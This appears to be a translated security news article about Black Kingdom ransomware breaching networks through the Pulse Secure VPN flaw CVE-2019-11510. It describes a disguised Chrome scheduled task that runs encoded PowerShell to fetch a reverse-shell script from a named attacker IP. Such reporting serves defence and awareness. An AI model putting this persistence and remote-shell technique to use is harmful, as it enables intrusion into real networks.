Monday, January 25, 20:46
Home security Black Kingdom ransomware breaches networks with Pulse VPN defects

Black Kingdom ransomware breaches networks with Pulse VPN defects

Black Kingdom ransomware operators target companies with unpatched Pulse Secure VPN software, according to security researchers.

Black Kingdom ransomware

The malware was trapped in a honeypot, allowing researchers to analyze and document the tactics used by the threat factors.

They take advantage of CVE-2019-11510, a critical vulnerability that affects older versions of the Pulse Secure VPN that was fixed in April 2019. Companies have delayed updating their software even after the publication of exploits, with the US government and some threatening agents taking advantage of it - some organizations continue to run a vulnerable version of the product.

REDTEAM.PL, a Polish-based cybersecurity company, noted that Black Kingdom operators used the same door provided by Pulse Secure VPN to violate what they thought was a target.

From the researchers' observations, ransomware identified persistence with the fake face of a legally programmed job for Google Chrome, with only one letter making the difference:

According to the analysis of REDTEAM.PL, the planned work executes a string code with Base64 encoding in a hidden window PowerShell to get a script named "reverse.ps1" which is probably used to open a "reverse shell" on the compromised host.

Adam Ziaja from REDTEAM.PL said that script it cannot be recovered from the remote server controlled by the intruder, probably because the server that hosted it was blocked before the payload was delivered.

The IP address where "reverse.ps1" resides is 198.13.49.179, which is managed by Choopa, a subsidiary of Vultr, known for the cheap virtual private servers (VPS) it provides. The servers they are also used by Criminals in cyberspace to house their malicious tools.

Black Kingdom ransomware

Recent appearance

Black Kingdom ransomware was first detected in late February by security researcher GrujaRS, who found that it accompanied the extension .DEMON to encrypted files.

The sample analyzed was communicated to the same IP address found in its report REDTEAM.PL. The following ransom note appeared asking for $ 10.000 to be deposited in a bitcoin wallet and threatening that if he did not do so it would lead to the destruction or sale of the data.

Black Kingdom ransomware

LEAVE ANSWER

Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehchttps://www.secnews.gr
Be the limited edition.

LIVE NEWS

iPhone: How to see which apps have access to your contacts

Some iPhone privacy issues go deeper than accessing your contacts list, which exposes your contacts to ...

COVID-19: Google makes vaccination clinics available

Google CEO Sundar Pichai said Monday that the company will make its facilities available to become clinics ...

Netflix offers "studio quality" audio upgrade on Android

Do not be surprised if Netflix sounds better the next time you run a marathon with rows on your Android phone ...

Will Bitcoin return to $ 40.000? There is concern!

Bitcoin lovers who take his return above the level of $ 40.000 for granted have been worried because the demand ...

Avaddon ransomware: Its operators threaten with DDoS attacks to get ransom!

Lately, more and more ransomware gangs tend to threaten their targets with DDoS attacks in order to secure profits ....

Volunteer firefighters will be trained through VR simulation

Volunteer firefighters in the Australian state of Victoria will soon have access to the virtual reality (VR) training that will be available in ...

Tesla: Accuses its former employee of stealing her confidential data!

On January 23, Tesla sued former employee Alex Khatilov for stealing 26.000 confidential documents, including trade secrets. The software ...

SpaceX launched 143 satellites simultaneously

SpaceX broke every record with its last spacecraft mission into orbit. The company successfully launched the Transporter-1 mission ...

Sony may resurrect the Xperia Compact to compete with Apple

Have you seen the iPhone 12 mini and wish there was an Android equivalent to this small but powerful smartphone? Can the desire ...

Artificial intelligence (AI) may one day be used against us

AI algorithms offer us the news we read, the ads we see, and in some cases even drive cars ...